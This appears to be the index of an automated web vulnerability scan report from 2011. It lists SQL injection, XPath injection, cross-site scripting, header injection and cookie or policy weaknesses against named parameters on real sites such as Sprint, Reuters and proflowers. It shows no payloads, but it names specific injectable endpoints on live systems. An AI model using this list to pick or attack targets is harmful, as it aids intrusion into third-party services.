XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-03

Report generated by XSS.CX at Sat Sep 03 19:31:37 GMT-06:00 2011.

1. SQL injection

1.1. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s81099810544401 [REST URL parameter 1]

1.2. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84142070419620 [REST URL parameter 2]

1.3. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s84476320391986 [REST URL parameter 2]

1.4. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s85063178692944 [REST URL parameter 1]

2. XPath injection

2.1. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 2]

2.2. http://content.usatoday.com/communities/campusrivalry/topics [REST URL parameter 3]

3. Cross-site scripting (stored)

3.1. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

3.2. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

4. HTTP header injection

4.1. http://m.xp1.ru4.com/activity [redirect parameter]

4.2. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

4.3. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0026084b [REST URL parameter 9]

5.2. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0054242b [REST URL parameter 9]

5.3. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0057916b [REST URL parameter 9]

5.4. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0071881 [REST URL parameter 9]

5.5. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0073727b [REST URL parameter 9]

5.6. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0090481b [REST URL parameter 9]

5.7. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105447b [REST URL parameter 9]

5.8. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0105684b [REST URL parameter 9]

5.9. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/P0106998b [REST URL parameter 9]

5.10. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000001016X_35172_W1 [REST URL parameter 9]

5.11. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_000000076432_66228_W1_SQ [REST URL parameter 9]

5.12. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007G437_68702_W1_SQ [REST URL parameter 9]

5.13. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000007H355_69865_W2_SQ [REST URL parameter 9]

5.14. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H201_82170_W2_SQ [REST URL parameter 9]

5.15. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000008H203_82172_W1_SQ [REST URL parameter 9]

5.16. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_00000010D01X_103184_W1 [REST URL parameter 9]

5.17. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000008G370X_85066_W7_SQ [REST URL parameter 9]

5.18. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR10_0000009A230X_85266_W1_SQ [REST URL parameter 9]

5.19. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_000000011F48_0138343_W1_SQ [REST URL parameter 9]

5.20. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000002352X_0049859_W1_SQ [REST URL parameter 9]

5.21. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_00000011A98X_114727_W1 [REST URL parameter 9]

5.22. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000009G125X_0090481_W2_SQ [REST URL parameter 9]

5.23. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011F111X_0138942_W1_SQ [REST URL parameter 9]

5.24. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G128X_0134102_W1_SQ [REST URL parameter 9]

5.25. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PCR11_0000011G242X_0136242_W1_SQ [REST URL parameter 9]

5.26. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0084749b [REST URL parameter 9]

5.27. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

5.28. http://api.bit.ly/shorten [callback parameter]

5.29. http://api.bit.ly/shorten [longUrl parameter]

5.30. http://api.echoenabled.com/v1/search [q parameter]

5.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.38. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

5.39. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

5.40. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 3]

5.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

5.42. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support [REST URL parameter 4]

5.43. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

5.44. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 3]

5.45. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

5.46. http://community.sprint.com/baw/community/buzzaboutwireless/general/suggestions-for-sprint [REST URL parameter 4]

5.47. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

5.48. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 3]

5.49. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

5.50. http://community.sprint.com/baw/community/sprintblogs/buzz-by-sprint/sprint-video [REST URL parameter 4]

5.51. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

5.52. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpck parameter]

5.53. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

5.54. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js [mpvc parameter]

5.55. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

5.56. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

5.57. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

5.58. http://jlinks.industrybrains.com/jsct [ct parameter]

5.59. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.60. http://jlinks.industrybrains.com/jsct [tr parameter]

5.61. http://js.www.reuters.com/recommend/re/re [callback parameter]

5.62. http://lingows.appspot.com/bubble/ [request_id parameter]

5.63. http://lingows.appspot.com/bubble/ [respond_path parameter]

5.64. http://lingows.appspot.com/content/LSXLXVUXQN/ [request_id parameter]

5.65. http://lingows.appspot.com/content/LSXLXVUXQN/ [respond_path parameter]

5.66. http://lingows.appspot.com/content/ZXANLLFMOV/ [request_id parameter]

5.67. http://lingows.appspot.com/content/ZXANLLFMOV/ [respond_path parameter]

5.68. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

5.69. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

5.70. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

5.71. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

5.73. http://www.publish2.com/newsgroups/state-worker.js [_ parameter]

5.74. http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter]

5.75. http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter]

5.76. http://www.reuters.com/assets/commentsChild [articleId parameter]

5.77. http://www.reuters.com/assets/commentsChild [channel parameter]

5.78. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

5.79. http://www.reuters.com/assets/newsFlash [&flashPath parameter]

5.80. http://www.reuters.com/assets/newsFlash [h parameter]

5.81. http://www.reuters.com/assets/newsFlash [w parameter]

5.82. http://www.reuters.com/assets/searchIntercept [blob parameter]

5.83. http://www.scribd.com/embeds/63688924/content [start_page parameter]

5.84. https://www.sprint.net/min/ [REST URL parameter 1]

5.85. https://www.sprint.net/performance [REST URL parameter 1]

5.86. https://www.sprint.net/performance/ [REST URL parameter 1]

5.87. https://www.sprint.net/performance/ [name of an arbitrarily supplied request parameter]

5.88. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 1]

5.89. https://www.sprint.net/performance/gen_line_xml.php [REST URL parameter 2]

5.90. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 1]

5.91. https://www.sprint.net/performance/gen_pop_xml.php [REST URL parameter 2]

5.92. https://www.sprint.net/performance/performance.swf [REST URL parameter 1]

5.93. https://www.sprint.net/performance/performance.swf [REST URL parameter 2]

5.94. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

5.95. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

5.96. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

5.97. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

5.98. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

5.99. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

5.100. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

5.101. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

5.102. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js [ruid cookie]

5.103. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

5.104. http://rma-api.gravity.com/v1/beacons/initialize [vaguid cookie]

5.105. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [JSESSIONID cookie]

6. Flash cross-domain policy

6.1. http://ad.afy11.net/crossdomain.xml

6.2. http://ad.turn.com/crossdomain.xml

6.3. http://altfarm.mediaplex.com/crossdomain.xml

6.4. http://api.bit.ly/crossdomain.xml

6.5. http://b.scorecardresearch.com/crossdomain.xml

6.6. http://bh.contextweb.com/crossdomain.xml

6.7. http://c.betrad.com/crossdomain.xml

6.8. http://c.casalemedia.com/crossdomain.xml

6.9. http://cdn.gigya.com/crossdomain.xml

6.10. http://cdn.taboolasyndication.com/crossdomain.xml

6.11. http://cdn.turn.com/crossdomain.xml

6.12. http://ce.lijit.com/crossdomain.xml

6.13. http://gannett.gcion.com/crossdomain.xml

6.14. http://get.lingospot.com/crossdomain.xml

6.15. http://gscounters.gigya.com/crossdomain.xml

6.16. http://i.casalemedia.com/crossdomain.xml

6.17. http://ib.adnxs.com/crossdomain.xml

6.18. http://img-cdn.mediaplex.com/crossdomain.xml

6.19. http://img.mediaplex.com/crossdomain.xml

6.20. http://imp.fetchback.com/crossdomain.xml

6.21. http://init.lingospot.com/crossdomain.xml

6.22. http://l.betrad.com/crossdomain.xml

6.23. http://m.xp1.ru4.com/crossdomain.xml

6.24. http://metrics.sprint.com/crossdomain.xml

6.25. http://nmsacramento.112.2o7.net/crossdomain.xml

6.26. http://pix04.revsci.net/crossdomain.xml

6.27. http://pixel.mathtag.com/crossdomain.xml

6.28. http://pixel.quantserve.com/crossdomain.xml

6.29. http://premium.mookie1.com/crossdomain.xml

6.30. http://query.yahooapis.com/crossdomain.xml

6.31. http://r.casalemedia.com/crossdomain.xml

6.32. http://r.turn.com/crossdomain.xml

6.33. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

6.34. http://s.meebocdn.net/crossdomain.xml

6.35. http://s0.2mdn.net/crossdomain.xml

6.36. http://secure-us.imrworldwide.com/crossdomain.xml

6.37. https://socialize.gigya.com/crossdomain.xml

6.38. http://statse.webtrendslive.com/crossdomain.xml

6.39. http://sync.adap.tv/crossdomain.xml

6.40. http://sync.mathtag.com/crossdomain.xml

6.41. http://tags.bluekai.com/crossdomain.xml

6.42. http://tcr.tynt.com/crossdomain.xml

6.43. http://trc.taboolasyndication.com/crossdomain.xml

6.44. http://turn.nexac.com/crossdomain.xml

6.45. http://usatoday1.112.2o7.net/crossdomain.xml

6.46. http://wa.proflowers.com/crossdomain.xml

6.47. http://www.wunderground.com/crossdomain.xml

6.48. http://adadvisor.net/crossdomain.xml

6.49. http://ads.adbrite.com/crossdomain.xml

6.50. http://cim.meebo.com/crossdomain.xml

6.51. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

6.52. http://content.usatoday.com/crossdomain.xml

6.53. http://grfx.cstv.com/crossdomain.xml

6.54. http://mi.adinterax.com/crossdomain.xml

6.55. http://optimized-by.rubiconproject.com/crossdomain.xml

6.56. http://rd.meebo.com/crossdomain.xml

6.57. http://snas.nbcuni.com/crossdomain.xml

6.58. http://syndication.mmismm.com/crossdomain.xml

6.59. http://www.facebook.com/crossdomain.xml

6.60. http://www.meebo.com/crossdomain.xml

6.61. http://www.reuters.com/crossdomain.xml

6.62. http://www.sacbee.com/crossdomain.xml

6.63. http://www.youtube.com/crossdomain.xml

6.64. http://api.twitter.com/crossdomain.xml

6.65. http://sales.reuters.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.2. http://content.usatoday.com/clientaccesspolicy.xml

7.3. http://metrics.sprint.com/clientaccesspolicy.xml

7.4. http://nmsacramento.112.2o7.net/clientaccesspolicy.xml

7.5. http://pixel.quantserve.com/clientaccesspolicy.xml

7.6. http://s0.2mdn.net/clientaccesspolicy.xml

7.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.8. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

7.9. http://wa.proflowers.com/clientaccesspolicy.xml

8. SSL cookie without secure flag set

9. Session token in URL

10. SSL certificate

10.1. https://sprintlb.ehosts.net/

10.2. https://socialize.gigya.com/

10.3. https://www.linkedin.com/

10.4. https://www.sprint.net/

11. Cookie scoped to parent domain

11.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

11.2. http://api.twitter.com/1/statuses/user_timeline.json

11.3. http://www.personalcreations.com/

11.4. http://ad.afy11.net/ad

11.5. http://ad.turn.com/server/ads.js

11.6. http://ads.adbrite.com/adserver/vdi/742697

11.7. http://ads.revsci.net/adserver/ako

11.8. http://ads.revsci.net/adserver/ako

11.9. http://ads.revsci.net/adserver/ako

11.10. http://b.scorecardresearch.com/b

11.11. http://b.scorecardresearch.com/p

11.12. http://b.scorecardresearch.com/r

11.13. http://bh.contextweb.com/bh/rtset

11.14. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

11.15. http://ce.lijit.com/merge

11.16. http://cm.npc-mcclatchy.overture.com/js_1_0/

11.17. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

11.18. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

11.19. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

11.20. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

11.21. http://i.casalemedia.com/imp.gif

11.22. http://ib.adnxs.com/getuid

11.23. http://image2.pubmatic.com/AdServer/Pug

11.24. http://imp.fetchback.com/serve/fb/adtag.js

11.25. http://imp.fetchback.com/serve/fb/imp

11.26. http://leadback.advertising.com/adcedge/lb

11.27. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

11.28. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

11.29. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

11.30. http://pix04.revsci.net/D08734/a1/0/0/0.gif

11.31. http://pix04.revsci.net/D08734/a1/0/3/0.js

11.32. http://pix04.revsci.net/F09828/a4/0/0/0.js

11.33. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

11.34. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

11.35. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

11.36. http://pixel.mathtag.com/sync

11.37. http://r.casalemedia.com/rum

11.38. http://r.openx.net/set

11.39. http://r.turn.com/r/bd

11.40. http://r.turn.com/r/beacon

11.41. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

11.42. http://rma-api.gravity.com/v1/beacons/initialize

11.43. http://rt.legolas-media.com/lgrt

11.44. http://sync.adap.tv/sync

11.45. http://sync.mathtag.com/sync

11.46. http://syndication.mmismm.com/tntwo.php

11.47. http://tacoda.at.atwola.com/rtx/r.js

11.48. http://tags.bluekai.com/site/4195

11.49. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

11.50. http://tu.connect.wunderloop.net/TU/1/1/1/

11.51. http://www.bizographics.com/collect/

11.52. https://www.linkedin.com/secure/login

11.53. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

11.54. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

11.55. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

11.56. http://www.personalcreations.com/just-because-gifts-PJBEBSL

11.57. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

11.58. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

11.59. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

11.60. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

11.61. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

11.62. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

11.63. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

11.64. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

11.65. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

11.66. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

11.67. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

11.68. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

11.69. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

11.70. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

11.71. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

11.72. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

12. Cookie without HttpOnly flag set

12.1. http://content.usatoday.com/asp/uas3/uasSignedOut.htm

12.2. http://trc.taboolasyndication.com/reuters/trc/2/json

12.3. https://www.linkedin.com/secure/login

12.4. http://www.personalcreations.com/

12.5. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

12.6. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

12.7. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

12.8. http://www.personalcreations.com/just-because-gifts-PJBEBSL

12.9. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

12.10. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

12.11. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

12.12. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

12.13. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

12.14. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

12.15. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

12.16. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

12.17. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

12.18. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

12.19. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

12.20. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

12.21. http://www.personalcreations.com/personalized-housewarming-gifts-PHOUSEW

12.22. http://www.personalcreations.com/personalized-pet-gifts-PPETBSL

12.23. http://www.personalcreations.com/personalized-romantic-gifts-PLARBSL

12.24. http://www.publish2.com/newsgroups/state-worker.js

12.25. http://ad.afy11.net/ad

12.26. http://ad.turn.com/server/ads.js

12.27. http://ad.yieldmanager.com/pixel

12.28. http://adadvisor.net/adscores/g.js

12.29. http://ads.adbrite.com/adserver/vdi/742697

12.30. http://ads.revsci.net/adserver/ako

12.31. http://ads.revsci.net/adserver/ako

12.32. http://ads.revsci.net/adserver/ako

12.33. http://b.scorecardresearch.com/b

12.34. http://b.scorecardresearch.com/p

12.35. http://b.scorecardresearch.com/r

12.36. http://bh.contextweb.com/bh/rtset

12.37. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

12.38. http://ce.lijit.com/merge

12.39. http://cm.npc-mcclatchy.overture.com/js_1_0/

12.40. http://community.sprint.com/baw/community/buzzaboutwireless

12.41. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

12.42. http://community.sprint.com/baw/community/sprintblogs

12.43. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2925993182975414771

12.44. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2925993182975414771

12.45. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2925993182975414771

12.46. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2925993182975414771

12.47. http://i.casalemedia.com/imp.gif

12.48. http://image2.pubmatic.com/AdServer/Pug

12.49. http://imp.fetchback.com/serve/fb/adtag.js

12.50. http://imp.fetchback.com/serve/fb/imp

12.51. http://leadback.advertising.com/adcedge/lb

12.52. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794

12.53. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

12.54. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

12.55. http://pix04.revsci.net/D08734/a1/0/0/0.gif

12.56. http://pix04.revsci.net/D08734/a1/0/3/0.js

12.57. http://pix04.revsci.net/F09828/a4/0/0/0.js

12.58. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

12.59. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

12.60. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

12.61. http://pixel.mathtag.com/sync

12.62. http://r.casalemedia.com/rum

12.63. http://r.openx.net/set

12.64. http://r.turn.com/r/bd

12.65. http://r.turn.com/r/beacon

12.66. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

12.67. http://rma-api.gravity.com/v1/beacons/initialize

12.68. http://rt.legolas-media.com/lgrt

12.69. http://sitelife.usatoday.com/ver1.0/Content/direct/scripts/DirectProxyFast.js

12.70. http://statse.webtrendslive.com/dcsncwimc10000kzgoor3wv9x_3f2v/dcs.gif

12.71. http://sync.adap.tv/sync

12.72. http://sync.mathtag.com/sync

12.73. http://syndication.mmismm.com/tntwo.php

12.74. http://tacoda.at.atwola.com/rtx/r.js

12.75. http://tags.bluekai.com/site/4195

12.76. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

12.77. http://tu.connect.wunderloop.net/TU/1/1/1/

12.78. http://www.bizographics.com/collect/

12.79. http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

13. Password field with autocomplete enabled

13.1. http://community.sprint.com/baw/community/buzzaboutwireless

13.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

13.3. http://community.sprint.com/baw/community/sprintblogs

13.4. http://community.sprint.com/baw/groups

13.5. http://community.sprint.com/baw/index.jspa

13.6. http://community.sprint.com/baw/reviews.jspa

13.7. https://www.linkedin.com/secure/login

13.8. http://www.sprint.com/index_c.html

13.9. https://www.sprint.net/performance/

13.10. https://www.sprint.net/performance/

14. Source code disclosure

14.1. http://community.sprint.com/baw/community/buzzaboutwireless

14.2. http://community.sprint.com/baw/community/buzzaboutwireless/customer-service/sprintdotcom-support

14.3. http://community.sprint.com/baw/community/sprintblogs

14.4. http://community.sprint.com/baw/index.jspa

15. ASP.NET debugging enabled

15.1. http://usata1.gcion.com/Default.aspx

15.2. http://www.wisdomtree.com/Default.aspx

16. Referer-dependent response

16.1. http://ads.adbrite.com/adserver/vdi/742697

16.2. http://www.facebook.com/plugins/like.php

16.3. http://www.facebook.com/plugins/likebox.php

16.4. http://www.youtube.com/embed/xXftjfC3b5o

17. Cross-domain POST

18. Cross-domain Referer leakage

18.1. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

18.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10

18.3. http://ad.doubleclick.net/adj/sacbee_cim/

18.4. http://ad.doubleclick.net/adj/uap.reuters/uap

18.5. http://ad.turn.com/server/ads.js

18.6. http://ad.turn.com/server/ads.js

18.7. http://ad.yieldmanager.com/pixel

18.8. http://c.casalemedia.com/c/1/1/89733/http://altfarm.mediaplex.com/ad/ck/10105-135615-9432-62

18.9. http://cdn.optmd.com/V2/89733/235451/index.html

18.10. http://cm.g.doubleclick.net/pixel

18.11. http://cm.g.doubleclick.net/pixel

18.12. http://cm.npc-mcclatchy.overture.com/js_1_0/

18.13. http://cms.ad.yieldmanager.net/v1/cms

18.14. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH

18.15. http://googleads.g.doubleclick.net/pagead/ads

18.16. http://googleads.g.doubleclick.net/pagead/ads

18.17. http://googleads.g.doubleclick.net/pagead/ads

18.18. http://googleads.g.doubleclick.net/pagead/ads

18.19. http://googleads.g.doubleclick.net/pagead/ads

18.20. http://img.mediaplex.com/content/0/10105/PC_YR11_720x300_Anniv_HrtsndprntPwtrpltThennowfrme_hp.js

18.21. http://imp.fetchback.com/serve/fb/imp

18.22. http://s6.scribdassets.com/aggregated/javascript/base.js

18.23. http://static.lingospot.com/js/all.js

18.24. http://www.facebook.com/plugins/likebox.php

18.25. http://www.personalcreations.com/

18.26. http://www.personalcreations.com/

18.27. http://www.personalcreations.com/

18.28. http://www.personalcreations.com/

18.29. http://www.reuters.com/assets/commentsChild

18.30. http://www.reuters.com/assets/newsFlash

18.31. http://www.scribd.com/embeds/63688924/content

18.32. http://www.scribd.com/embeds/63688924/content_inner

19. Cross-domain script include

19.1. http://ad.turn.com/server/ads.js

19.2. http://ad.turn.com/server/ads.js

19.3. http://blogs.sacbee.com/the_state_worker/

19.4. http://cdn.optmd.com/V2/89733/235451/index.html

19.5. http://community.sprint.com/baw/index.jspa

19.6. http://content.usatoday.com/communities/campusrivalry/topics

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://grfx.cstv.com/scripts/oas-omni-controls.js

19.10. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

19.11. http://www.facebook.com/plugins/likebox.php

19.12. http://www.personalcreations.com/

19.13. http://www.personalcreations.com/CatalogQuickOrder.aspx

19.14. http://www.personalcreations.com/CustomerService-ContactUs.aspx

19.15. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

19.16. http://www.personalcreations.com/default.aspx

19.17. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

19.18. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

19.19. http://www.personalcreations.com/just-because-gifts-PJBEBSL

19.20. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

19.21. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

19.22. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

19.23. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

19.24. http://www.personalcreations.com/personalized-business-gifts-PBIZGFT

19.25. http://www.personalcreations.com/personalized-christmas-gifts-PCHRBSL

19.26. http://www.personalcreations.com/personalized-communion-gifts-PCOMMUN

19.27. http://www.personalcreations.com/personalized-congratulations-gifts-PCONGRA

19.28. http://www.personalcreations.com/personalized-graduation-gifts-PGRADUA

19.29. http://www.personalcreations.com/personalized-halloween-clothes-PHALAPP

19.30. http://www.personalcreations.com/personalized-halloween-gifts-PHALLOW

19.31. http://www.personalcreations.com/personalized-halloween-treat-bags-PHALBAG

